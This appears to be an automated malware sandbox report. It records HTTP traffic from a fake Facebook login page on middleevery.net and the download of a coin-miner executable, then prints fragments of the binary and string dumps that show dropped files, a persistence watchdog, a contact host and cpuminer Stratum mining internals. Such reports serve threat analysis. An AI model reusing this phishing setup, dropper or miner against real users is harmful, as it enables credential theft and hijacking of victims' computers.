MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........::..[TM.[TM.[TM.GXM.[TM.}_M.[TM.GZM.[TM.DGM.[TM.[UM.[TM.}^MJ[TM_]RM.[TMRich.[TM................PE..L.....xH................. ...@.......u.......0....@..........................p..............................................XH..P....`.. ............................................................................0...............................text............ .................. ..`.rdata..."...0...0...0..............@..@.data........`.......`..............@....rsrc... ....`.......`..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

<<< skipped >>>

GET /fb_login/index_files/xgsOhvNndM-.js?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:16 GMT

Accept-Ranges: bytes

Content-Length: 39059

Content-Type: application/x-javascript

Age: 0

Connection: close

Server: YTS/1.20.28

/*1364239754,178142531*/..if (self.CavalryLogger) { CavalryLogger.start_js(["FdcP\/"]); }..__d("ad-logging",["Arbiter","AsyncRequest","Banzai","collectDataAttributes","Parent","UFITrackingNodes"],function(a,b,c,d,e,f){var g='ssinfeed',h=b('Arbiter'),i=b('AsyncRequest'),j=b('Banzai'),k=b('collectDataAttributes'),l=b('Parent'),m=b('UFITrackingNodes'),n={};function o(r){return (r.getAttribute&&(r.getAttribute('ajaxify')||r.getAttribute('data-endpoint'))||r.action||r.href||r.name);}function p(r){var s=r.ei||r.ai;if(!s&&r.mei)s=r.mf_story_key||r.mk;if(r!==null&&typeof(s)==="string"){if(r.tn){var t=r.tn.charAt(0),u=m.decodeTrackingInfo(t);if((u==m.types.LIKE_LINK)||(u==m.types.UNLIKE_LINK)||(u==m.types.COMMENT)||(u==m.types.ADD_COMMENT_BOX)||(u==m.types.SHARE_LINK))return;}var v=Date.now(),w=500;r.duplicate_click=!!n[s]&&(v-n[s]<w);n[s]=v;if(j.isEnabled('ssinfeed')){j.post(g,r,{delay:0,retry:j.isEnabled('ssinfeed_retry')});}else new i('/ajax/ssinfeed/end/').setData(r).setAllowCrossPageTransition(true).setMethod('POST').send();}}function q(r,s){if(!s.node)return;var t=o(s.node),u=l.byTag(s.node,'input')||l.byTag(s.node,'button');if(!t&&u&&u.type=="submit"&&u.getAttribute&&u.getAttribute('data-ft'))t="#";var v;if(t&&s.event&&(s.event.type==='click'||s.event.type==='contextmenu')){v=k(s.node,['ft']);v.ft.href=t;v.ft.mouse_type=s.event.type;p(v.ft);}}h.subscribe("ClickRefAction/new",q);});.__d("CalendarUI",["Event","Arbiter","AsyncRequest","CSS","DOM","DOMQuery","DOMScroll","Hovercard","Parent","Run","ScrollAwareDOM",

<<< skipped >>>

GET /fb_login/index_files/VYqjPg0eFkT.css?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/css,*/*;q=0.1

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 130667

Content-Type: text/css

Age: 0

Connection: close

Server: YTS/1.20.28

/*1364177030,178142509*/..._4-do{text-align:center}.._4-dp{font-size:24px;line-height:28px;margin:40px 0 20px}.._4-dq{font-size:16px;line-height:20px;margin:20px 0}.._4-dr{font-size:12px;line-height:20px}..fbForBusinessWrapper{margin:0 auto;width:980px}..fbForBusinessContent{border-bottom:1px solid #f2f2f2;position:relative}..fbForBusinessNoBorder{border-bottom:none}..fbForBusinessRightCol img{background-color:#ccc;border:5px solid #f9f9f9;float:right;padding:1px}..fbBusinessHomeVideo{background-color:#fff;border:1px solid #ccc}..fbForBusinessContent img,..fbForBusinessFloatedLeft{display:block;float:left}..fbForBusinessPageHeader{margin-top:40px}..fbForBusinessHomePageHeaderText{margin-top:50px}..fbMarketingMenu{list-style:none;margin:0 0 20px 0;padding:0}..fbMarketingMenu a{border-top:1px solid #e5e5e5;display:block;font-size:13px}..fbForBusinessMenuLast a{border-bottom:1px solid #e5e5e5}..fbMarketingMenu a.currentPage,..fbMarketingMenu a:hover{background:#f9f9f9 url(hXXps://fbstatic-a.akamaihd.net/rsrc.php/v2/yE/r/JQgQHls27pw.png) no-repeat center right;text-decoration:none}..fbForBusinessHelpfulLinks ul{list-style:none;margin-left:0;padding-left:0}..fbForBusinessHelpfulLinks ul li{font-size:11px;line-height:1.5}..fbForBusinessHelpfulLinks div{color:#666;font-size:11px}..fbForBusinessTip{background:#f9f9f9 url(hXXps://fbstatic-a.akamaihd.net/rsrc.php/v2/yb/r/qt94E91uvnk.png) no-repeat 15px 10px;border:1px solid #ccc;padding-left:40px}..fbForBusinessList li div{color:#999;font-size:15px;line-height:20px}..fbF

<<< skipped >>>

GET /dep/win64mrocli2.exe HTTP/1.0

Accept: */*

Connection: close

Host: middleevery.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:38 GMT

Last-Modified: Sat, 24 May 2014 21:17:40 GMT

Accept-Ranges: bytes

Content-Length: 2954752

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...w..S.................."...-..\............@...............................-.......-...............................................-...... -.d$............*.p"...........p-.PG.......................... `-.(....................(-.X............................text.....".......".................`.p`.data.........".......".............@....rdata........#.......#.............@.`@.pdata..p"....*..$...r*.............@.0@.xdata........ ....... .............@.@@.bss.....[....,.......................`..edata........-.......,.............@.0@.idata..d$... -..&....,.............@.0..CRT....p....P-.......,.............@.@..tls....h....`-.......,.............@.`..reloc..PG...p-..H....,.............@.0B.................................................................................................................................................................................................ffffff.........H..(1.f.=....MZ....,.........,.........,.........,.....tg....,.....,...tH........".H........]".....,.H....,.H....,.H....-.....b"..=h.#..tf1.H..(........."......Hc.....H..B...H...:PE..u...J.f....t?f......j............].........1.......K...f.H...b"...b".1.H..(..zt...,.........1............H..8....,.D....,.L....,.H....,.H....,.....,.H....,.H.D$ ...".....,.H..8.........AUATUWVSH......D....,.1......H.T$ E..H...H.......eH..%0...1.H.X.H.=..-..........H9...'..........H...H...|.,.H..u...y.,.1........

<<< skipped >>>

GET /fb_login/index_files/lV3BV1YRc-7.js?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 71231

Content-Type: application/x-javascript

Age: 0

Connection: close

Server: YTS/1.20.28

/*1364175964,173217823*/..if (self.CavalryLogger) { CavalryLogger.start_js(["kQ5UI"]); }..__d("PHPQuerySerializer",[],function(a,b,c,d,e,f){function g(n){return h(n,null);}function h(n,o){o=o||'';var p=[];if(n===null||n===undefined){p.push(i(o));}else if(n instanceof Array){for(var q=0;q<n.length; q)if(n[q]!==undefined)p.push(h(n[q],o?(o '[' q ']'):q));}else if(typeof(n)=='object'){for(var r in n)if(n[r]!==undefined)p.push(h(n[r],o?(o '[' r ']'):r));}else p.push(i(o) '=' i(n));return p.join('&');}function i(n){return encodeURIComponent(n).replace(/%5D/g,"]").replace(/[/g,"[");}var j=/^(\w )((?:\[\w*\]) )=?(.*)/;function k(n){if(!n)return {};var o={};n=n.replace(/[/ig,'[').replace(/%5D/ig,']');n=n.split('&');var p=Object.prototype.hasOwnProperty;for(var q=0,r=n.length;q<r;q ){var s=n[q].match(j);if(!s){var t=n[q].split('=');o[l(t[0])]=t[1]===undefined?null:l(t[1]);}else{var u=s[2].split(/\]\[|\[|\]/).slice(0,-1),v=s[1],w=l(s[3]||'');u[0]=v;var x=o;for(var y=0;y<u.length-1;y )if(u[y]){if(!p.call(x,u[y])){var z=u[y 1]&&!u[y 1].match(/^\d $/)?{}:[];x[u[y]]=z;if(x[u[y]]!==z)return o;}x=x[u[y]];}else{if(u[y 1]&&!u[y 1].match(/^\d $/)){x.push({});}else x.push([]);x=x[x.length-1];}if(x instanceof Array&&u[u.length-1]===''){x.push(w);}else x[u[u.length-1]]=w;}}return o;}function l(n){return decodeURIComponent(n.replace(/\ /g,' '));}var m={serialize:g,encodeComponent:i,deserialize:k,decodeComponent:l};e.exports=m;});.__d("URIBase",["copyProperties","PHPQuerySerializer"],function(a,b,c,d,e,f){var g=b('copy

<<< skipped >>>

Map

The Malware connects to the servers at the folowing location(s):

Strings from Dumps

unovkkdak.exe_3644:

.text

`.rdata

@.data

QSSSSSSh

SQSSSh

YrR.Vf

-.pX>

SSSh0

SPSSSh

SSShp/C

tFSSSh

t)SSShP

SSShP

SSShp

SSShp&C

t\SSSh

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

WS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

GetProcessHeap

KERNEL32.dll

USER32.dll

GetCPInfo

GetConsoleOutputCP

unovkkdak.exe

zj.exe

eityzygishyx.exe

o8.OLnzG

.LlqI

Y:\Bp

%s _\(

?_.eg]

Ì>$

By.Ix

j.mSd

%u 0a

zcÁ

%Documents and Settings%\LocalService

|%System%\eityzygishyx.exe

|wellshirt.net

WATCHDOGPROC "c:\windows\system32\unovkkdak.exe"

%System%\unovkkdak.exe

mscoree.dll

KERNEL32.DLL

eityzygishyx.exe_4936:

.text

`.rdata

@.data

QSSSSSSh

SQSSSh

YrR.Vf

-.pX>

SSSh0

SPSSSh

SSShp/C

tFSSSh

t)SSShP

SSShP

SSShp

SSShp&C

t\SSSh

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

WS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

GetProcessHeap

KERNEL32.dll

USER32.dll

GetCPInfo

GetConsoleOutputCP

unovkkdak.exe

zj.exe

eityzygishyx.exe

o8.OLnzG

.LlqI

Y:\Bp

%s _\(

?_.eg]

Ì>$

By.Ix

j.mSd

%u 0a

zcÁ

%Documents and Settings%\LocalService

%System%\eityzygishyx.exe

mscoree.dll

KERNEL32.DLL

win32mrocli2.exe_428:

.text

p`.data

.rdata

`@.bss

.idata

\\\\5\\\\

|$\3|$81

\$\3\$`3

""""%""""1

1|$,1\$,

|$@3\$,3\$0

\$$!|$$!

|$ 1|$41

\$0#\$(1

\$\3\$ 1|$(

\$43\$01

\$ 3\$41

1\$,1|$,

\$ 3\$(3\$8

|$03|$43|$@

|$,3|$83|$ 3|$

|$4#|$(3<$

%UUUU

L$p%UUUU

|$43|$<1

SHA256 block transform for x86, CRYPTOGAMS by <appro></appro>

libgcj-13.dll

accepted: %lu/%lu (%.2f%%), %.2f H/s at diff %g %s

accepted: %lu/%lu (%.2f%%), %s khash/s %s

DEBUG: reject reason: %s

DEBUG: job_id='%s' extranonce2=%s ntime=x

{"method": "getjob", "params": {"id": "%s"}, "id":1}

JSON decode of %s failed

http://

https://

stratum tcp://

http://%s

cpuminer 2.3.3

Starting Stratum on %s

...terminating workio thread

...retry after %d seconds

JSON decode failed(%d): %s

Binding thread %d to cpu %d

thread %d: %lu hashes, %.2f H/s

thread %d: %lu hashes, %.2f khash/s

Total: %s H/s

Total: %s khash/s

work retrieval failed, exiting mining thread %d

JSON key '%s' not found

JSON key '%s' is not a string

Auth id: %s

JSON returned status "%s"

{"method": "login", "params": {"login": "%s", "pass": "%s", "agent": "cpuminer-multi/0.1"}, "id": 1}

DEBUG: authenticated in %d ms

json_rpc2.0 error: %s

CURL initialization failed

%s%s%s

Long-polling activated for %s

{"method": "submit", "params": {"id": "%s", "job_id": "%s", "nonce": "%s", "result": "%s"}, "id":1}

{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}

{"method": "getwork", "params": [ "%s" ], "id":1}

getwork failed, retry after %d seconds

DEBUG: got new work in %d ms

%s: unsupported non-option argument '%s'

JSON option %s invalid

%s: no URL supplied

%s:%s

https:

thread %d create failed

%d miner threads started, using '%s' algorithm.

cert

userpass

[%d-d-d d:d:d] %s

User-Agent: cpuminer/2.3.3

HTTP request failed: %s

JSON-RPC call failed: %s

hex2bin failed on '%s'

DEBUG: %s

Hash: %s

Target: %s

http%s

Stratum connection failed: %s

{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.3", "%s"]}

{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.3"]}

mining.notify

Stratum session id: %s

mining.set_difficulty

client.reconnect

stratum tcp://%s:%d

Ignoring request to reconnect to %s

Server requested reconnection to %s

client.get_version

cpuminer/2.3.3

client.show_message

MESSAGE FROM SERVER: %s

{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}

tXXFr.rh.44Aw-wl-66

r.rh.44Fw-wl-66A

.rh.44Fr-wl-66Aw

O9K\9..eKW

trh.44Fr.wl-66Aw-

K\9..eK9

h.44Fr.rl-66Aw-w

O\9..eK9K=W

.44Fr.rh-66Aw-wl

9..eK9K\W

t44Fr.rh.66Aw-wl-

..eK9K\9

tX4Fr.rh.46Aw-wl-6

.eK9K\9.

:,7.35.0

smtp

tftp

getpeername() failed with errno %d: %s

getsockname() failed with errno %d: %s

ssrem inet_ntop() failed with errno %d: %s

ssloc inet_ntop() failed with errno %d: %s

sa_addr inet_ntop() failed with errno %d: %s

Trying %s...

Could not set TCP_NODELAY: %s

TCP_NODELAY set

Failed to set SO_KEEPALIVE on fd %d

Failed to set SIO_KEEPALIVE_VALS on fd %d: %d

Couldn't bind to interface '%s'

Local Interface %s is ip %s using address family %i

Name '%s' family %i resolved to '%s' family %i

Local port: %hu

Bind to local port %hu failed, trying next

bind failed with errno %d: %s

Immediate connect fail for %s: %s

Couldn't bind to '%s'

connect to %s port %ld failed: %s

Failed to connect to %s port %ld: %s

[%s %s %s]

Send failure: %s

Recv failure: %s

Write callback asked for PAUSE when not supported!

%s:%d

Hostname was %sfound in DNS cache

timeout on name lookup is not supported

%5[^:]:%d:%5s

Resolve %s found illegal!

Added %s:%d:%s to DNS cache

IDN support not present, can't parse Unicode domains

CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!

Connected to %s (%s) port %ld (#%ld)

User-Agent: %s

[^:]:%[^

:]://%[^

<url> malformed</url>

SMTP.

Rebuilt URL to: %s

Protocol %s not supported or disabled in libcurl

%s://%s

http_proxy

[%*45[0123456789abcdefABCDEF:.]%c

;type=%c

%s://%s%s%s:%hu%s%s%s

Port number too large: %lu

Couldn't find host %s in the _netrc file; using defaults

ftp@example.com

Found bundle for host %s: %p

Server doesn't support pipelining

Found connection %ld, with requests in the pipe (%zu)

Re-using existing connection! (#%ld) with host %s

Couldn't resolve host '%s'

Couldn't resolve proxy '%s'

Connection #%ld to host %s left intact

Curl_poll(%d ds, %d ms)

Internal error clearing splay node = %d

Internal error removing splay node = %d

Pipe broke: handle 0x%p, url = %s

In state %d with no easy_conn, bail out!

Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received

Operation timed out after %ld milliseconds with %I64d bytes received

#HttpOnly_

23[^;

=]=I99[^;

httponly

skipped cookie with bad tailmatch domain: %s

%s cookie %s="%s" for domain %s, path %s, expire %I64d

# Netscape HTTP Cookie File

# http://curl.haxx.se/docs/http-cookies.html

# This file was generated by libcurl! Edit at your own risk.

# Fatal libcurl error

WARNING: failed to save cookies in %s

%d.%d.%d.%d

CURLSHcode unknown

Protocol option is unsupported

Protocol is unsupported

Socket is unsupported

Operation not supported

Address family not supported

Protocol family not supported

Winsock version not supported

Unknown error %d (%#x)

Please call curl_multi_perform() soon

Unsupported protocol

URL using bad/illegal format or missing URL

A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.

FTP: weird server reply

FTP: The server failed to connect to data port

FTP: unknown PASS reply

FTP: Accepting server connect has timed out

FTP: unknown PASV reply

FTP: unknown 227 response format

FTP: can't figure out the host in the PASV response

FTP: couldn't set file type

FTP: couldn't retrieve (RETR failed) the specified file

HTTP response code said error

FTP: command PORT failed

FTP: command REST failed

Operation was aborted by an application callback

A libcurl function was given a bad argument

An unknown option was passed in to libcurl

SSL peer certificate or SSH remote key was not OK

Problem with the local SSL certificate

Peer certificate cannot be authenticated with given CA certificates

Unrecognized or bad HTTP Content or Transfer-Encoding

Invalid LDAP URL

TFTP: File Not Found

TFTP: Access Violation

TFTP: Illegal operation

TFTP: Unknown transfer ID

TFTP: No such user

Caller must register CURLOPT_CONV_ callback options

Problem with the SSL CA cert (path? access rights?)

Error in the SSH layer

Issuer check against peer certificate failed

FTP: The server did not accept the PRET command.

Unable to parse FTP file list

0123456789

%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s

Curl_ipv4_resolve_r failed for %s

%sAuthorization: Basic %s

HTTP/

Avoided giant realloc for header (max is %d)!

The requested URL returned error: %d

%s auth using %s with user '%s'

%s, d %s M d:d:d GMT

If-Modified-Since: %s

If-Unmodified-Since: %s

Last-Modified: %s

Referer: %s

Accept-Encoding: %s

Host: %s%s%s

Host: %s%s%s:%hu

ftp://

Range: bytes=%s

Content-Range: bytes %s%I64d/%I64d

Content-Range: bytes %s/%I64d

ftp://%s:%s@%s

%s HTTP/%s

%s%s%s%s%s%s%s%s%s%s%s

%s%s=%s

Internal HTTP POST error!

Content-Type: application/x-www-form-urlencoded

Failed sending HTTP POST request

Failed sending HTTP request

Chunky upload is not supported by HTTP 1.0

HTTP error before end of send, stop sending

HTTP/%d.%d =

HTTP =

RTSP/%d.%d =

The requested URL returned error: %s

HTTP 1.0, assume close after body

HTTP/1.0 proxy connection set to keep alive!

HTTP/1.1 proxy connection set close!

HTTP/1.0 connection set to keep alive!

USER %s

PBSZ %d

Failure sending QUIT command: %s

ftp server doesn't support SIZE

RETR %s

Connect data stream passively

APPE %s

STOR %s

SIZE %s

getsockname() failed: %s

failed to resolve the address provided to PORT: %s

bind(port=%hu) on non-local address failed: %s

bind(port=%hu) failed: %s

bind() failed, we ran out of ports!

socket failure: %s

%s |%d|%s|%hu|

Failure sending EPRT command: %s

,%d,%d

%s %s

Failure sending PORT command: %s

Uploading to a URL without a file name!

FTPS not supported!

PASS %s

ACCT %s

Access denied: d

%c%c%c%u%c

Illegal port number in EPSV reply

%d,%d,%d,%d,%d,%d

Skips %d.%d.%d.%d for data connection, uses %s instead

Bad PASV/EPSV response: d

Can't resolve proxy host %s:%hu

Can't resolve new host %s:%hu

Connecting to %s (%s) port %d

TYPE %c

MDTM %s

CWD %s

PRET %s

PRET STOR %s

PRET RETR %s

REST %d

FTP response timeout

FTP response aborted due to select/poll error: %d

Preparing for accepting server on data port

Got a d ftp-server response when 220 was expected

unsupported parameter to CURLOPT_FTPSSLAUTH: %d

AUTH %s

ACCT rejected by server: d

PROT %c

Entry path is '%s'

QUOT command failed with d

MKD %s

Failed to MKD dir: d

dddddd

ddd d:d:d GMT

Last-Modified: %s, d %s M d:d:d GMT

unsupported MDTM reply format

Got a d response code instead of the assumed 200

PRET command not accepted: d

Failed to do PORT

RETR response: d

Failed FTP upload:

Wildcard - START of "%s"

Wildcard - "%s" skipped by user

ftp_perform ends with SECONDARY: %d

Remembering we are in dir "%s"

Failure sending ABOR command: %s

server did not report OK, got %d

QUOT string not accepted: %s

PORT

%s IAC %s

%s IAC %d

%s %s %s

%s %s %d

%s %d %d

Sending data failed (%d)

%s IAC SB

%s (unsupported)

%d (unknown)

%c%c%c%c%s%c%c

%c%c%c%c

7[^,],7s

%c%s%c%s

USER,%s

7[^= ]%*[ =]%5s

Syntax error in telnet option: %s

Unknown telnet option %s

WSAStartup failed (%d)

insufficient winsock version to support telnet

failed to load WS2_32.DLL (%d)

failed to find WSACreateEvent function (%d)

failed to find WSACloseEvent function (%d)

failed to find WSAEventSelect function (%d)

failed to find WSAEnumNetworkEvents function (%d)

WSACreateEvent failed (%d)

WSAEnumNetworkEvents failed (%d)

WSACloseEvent failed (%d)

FreeLibrary(wsock2) failed (%d)

WS2_32.DLL

CLIENT libcurl 7.35.0

MATCH %s %s %s

DEFINE %s %s

LDAP local: LDAP Vendor = %s ; LDAP Version = %d

LDAP local: %s

LDAP local: Cannot connect to %s:%ld

LDAP local: ldap_simple_bind_s %s

LDAP remote: %s

There are more than %d entries

LDAP local: trying to establish %s connection

Couldn't open file %s

Can't open %s for writing

Can't get the size of %s

Received last DATA packet block %d again.

Received unexpected DATA packet block %d, expecting block %d

Timeout waiting for block %d ACK. Retries = %d

tftp_rx: internal error

set timeouts for state %d; Total %ld, retry %d maxtry %d

Received ACK for block %d, expecting %d

tftp_tx: giving up waiting for block %d ack

tftp_tx: internal error, event: %i

bind() failed; %s

%s%c%s%c

tftp_send_first: internal error

TFTP finished

TFTP response timeout

got option=(%s) value=(%s)

blksize is larger than max supported

%s (%d)

blksize is smaller than min supported

%s (%ld)

%s (%d) %s (%d)

invalid tsize -:%s:- value in OACK packet

TFTP

%cd

LIST "%s" *

FETCH %s BODY[%s]

AUTHENTICATE %s %s

AUTHENTICATE %s

No known authentication mechanisms supported!

IMAPS not supported!

Access denied: %d

APPEND %s (\Seen) {%I64d}

SELECT %s

LOGINDISABLED

STARTTLS not supported.

STARTTLS denied. %c

Access denied. %c

Authentication failed: %d

AUTH %s %s

POP3S not supported!

APOP %s %s

STLS not supported.

RCPT TO:%s

RCPT TO:<%s>

SMTPS not supported!

Got unexpected smtp-server response: %d

EHLO %s

HELO %s

Remote access denied: %d

Command failed: %d

MAIL failed: %d

RCPT failed: %d

DATA failed: %d

MAIL FROM:%s

MAIL FROM:%s AUTH=%s

MAIL FROM:%s AUTH=%s SIZE=%s

MAIL FROM:%s SIZE=%s

SMTP

Refusing to issue an RTSP request [%s] without a session ID.

Transport:

Transport: %s

Refusing to issue an RTSP SETUP without a Transport: header.

Range: %s

%s %s RTSP/1.0

Session: %s

%s%s%s%s%s%s

Unable to read the CSeq header: [%s]

Got RTSP Session ID Line [%s], but wanted ID [%s]

Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds

%%X

xxxx

%s:%s:%s

%s:%.*s

%s:%s:x:%s:%s:%s

%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=x, qop=%s, response="%s"

%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", response="%s"

%s, opaque="%s"

%s, algorithm="%s"

SOCKS4 communication to %s:%d

SOCKS4 connect to %s (locally resolved)

Failed to resolve "%s" for SOCKS4 connect.

SOCKS4%s request granted.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.

User was rejected by the SOCKS5 server (%d %d).

SOCKS5 GSSAPI per-message authentication is not supported.

No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)

Failed to resolve "%s" for SOCKS5 connect.

Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)

Can't complete SOCKS5 connection to %s:%d. (%d)

Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)

Establish HTTP proxy tunnel to %s:%hu

%s:%hu

%s%s%s:%hu

Host: %s

CONNECT %s HTTP/%s

%s%s%s%s

HTTP/1.%d %d

TUNNEL_STATE switched to: %d

Received HTTP code %d from proxy after CONNECT

password

operation aborted by callback

Read callback asked for PAUSE when not supported!

seek callback returned error %d

the ioctl callback returned %d

ioctl callback returned error %d

Rewinding stream by : %zd bytes on url %s (zero-length body)

Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)

HTTP server doesn't seem to support byte ranges. Cannot resume.

Simulate a HTTP 304 response!

Problem (%d) in the Chunked-Encoded data

Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)

Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d

No URL set!

[^?&/:]://%c

Issue another request to this URL: '%s'

Violate RFC 2616/10.3.2 and switch from POST to GET

Violate RFC 2616/10.3.3 and switch from POST to GET

Disables POST, goes with %s

Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s

Site %s:%d is pipeline blacklisted

Server %s is not blacklisted

Server %s is blacklisted

d:d:d

d:d

%c%c==

%c%c%c=

------------------------xx

; filename="%s"

%s; boundary=%s

Content-Type: multipart/mixed, boundary=%s

Content-Type: %s

couldn't open file "%s"

--%s--

.jpeg

.html

0123456789-

%s xxxxxxxxxxxxxxxx

%s/%s

username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s

user=%s

auth=Bearer %s

%s near '%s'

%s near end of file

unable to decode byte 0x%x at position %d

control character 0x%x

invalid Unicode '\uX\uX'

invalid Unicode '\uX'

end == saved_text lex->saved_text.length

unable to open %s: %s

\ux

\ux\ux

Assertion failed: (%s), file %s, line %d

M%p %d %s

M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s

once %p is %d

T%p %d %s

T%p %d V=%0X H=%p %s

C%p %d %s

C%p %d V=%0X B=%d b=%p w=%ld %s

RWL%p %d %s

RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s

SHA-256 part of OpenSSL 1.0.1e 11 Feb 2013

%s(%d): OpenSSL internal error, assertion failed: %s

x509_pkey

evp_pkey

ssl_cert

ssl_sess_cert

Stack part of OpenSSL 1.0.1e 11 Feb 2013

error:lX:%s:%s:%s

passed a null parameter

x509 certificate routines

DSO support routines

dhKeyAgreement

challengePassword

extendedCertificateAttributes

nsCertExt

Netscape Certificate Extension

nsCertType

Netscape Cert Type

nsBaseUrl

Netscape Base Url

nsRevocationUrl

Netscape Revocation Url

nsCaRevocationUrl

Netscape CA Revocation Url

nsRenewalUrl

Netscape Renewal Url

nsCaPolicyUrl

Netscape CA Policy Url

nsCertSequence

Netscape Certificate Sequence

subjectKeyIdentifier

X509v3 Subject Key Identifier

keyUsage

X509v3 Key Usage

privateKeyUsagePeriod

X509v3 Private Key Usage Period

certificatePolicies

X509v3 Certificate Policies

authorityKeyIdentifier

X509v3 Authority Key Identifier

extendedKeyUsage

X509v3 Extended Key Usage

TLS Web Server Authentication

TLS Web Client Authentication

pbeWithSHA1And3-KeyTripleDES-CBC

pbeWithSHA1And2-KeyTripleDES-CBC

keyBag

pkcs8ShroudedKeyBag

certBag

localKeyID

x509Certificate

sdsiCertificate

id-smime-mod-msg-v3

id-smime-ct-publishCert

id-smime-aa-msgSigDigest

id-smime-aa-encrypKeyPref

id-smime-aa-signingCertificate

id-smime-aa-smimeEncryptCerts

id-smime-aa-ets-otherSigCert

id-smime-aa-ets-CertificateRefs

id-smime-aa-ets-certValues

id-smime-aa-ets-certCRLTimestamp

id-mod-qualified-cert-88

id-mod-qualified-cert-93

id-mod-attribute-cert

id-it-caProtEncCert

id-it-signKeyPairTypes

id-it-encKeyPairTypes

id-it-caKeyUpdateInfo

id-it-unsupportedOIDs

id-it-keyPairParamReq

id-it-keyPairParamRep

id-it-revPassphrase

id-regCtrl-oldCertID

id-regCtrl-protocolEncrKey

id-regInfo-certReq

id-cmc-getCert

id-cmc-confirmCertAcceptance

id-ecPublicKey

set-msgExt

set-certExt

certificate extensions

setct-AcqCardCodeMsg

setct-PCertReqData

setct-PCertResTBS

setct-CertReqData

setct-CertReqTBS

setct-CertResData

setct-CertInqReqTBS

setct-AcqCardCodeMsgTBE

setct-CertReqTBE

setct-CertReqTBEX

setct-CertResTBE

setCext-certType

setCext-cCertRequired

setAttr-Cert

set-rootKeyThumb

JOINT-ISO-ITU-T

joint-iso-itu-t

msSmartcardLogin

Microsoft Smartcardlogin

proxyCertInfo

Proxy Certificate Information

certicom-arc

certificateIssuer

X509v3 Certificate Issuer

id-PasswordBasedMAC

password based MAC

id-Gost28147-89-CryptoPro-KeyMeshing

id-Gost28147-89-None-KeyMeshing

LocalKeySet

Microsoft Local Key set

supportedApplicationContext

userPassword

userCertificate

cACertificate

certificateRevocationList

crossCertificatePair

supportedAlgorithms

anyExtendedKeyUsage

Any Extended Key Usage

lhash part of OpenSSL 1.0.1e 11 Feb 2013

[d:d:d]

%5lu file=%s, line=%d,

number=%d, address=lX

thread=%lu, file=%s, line=%d, info="

%ld bytes leaked in %d chunks

Big Number part of OpenSSL 1.0.1e 11 Feb 2013

bn(%d,%d)

ASN.1 part of OpenSSL 1.0.1e 11 Feb 2013

OPENSSL_Uplink(%p,X):

_matherr(): %s in %s(%g, %g) (retval=%g)

VirtualQuery failed for %d bytes at address %p

VirtualProtect failed with code 0x%x

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation bit size %d.

unknown option -- %s

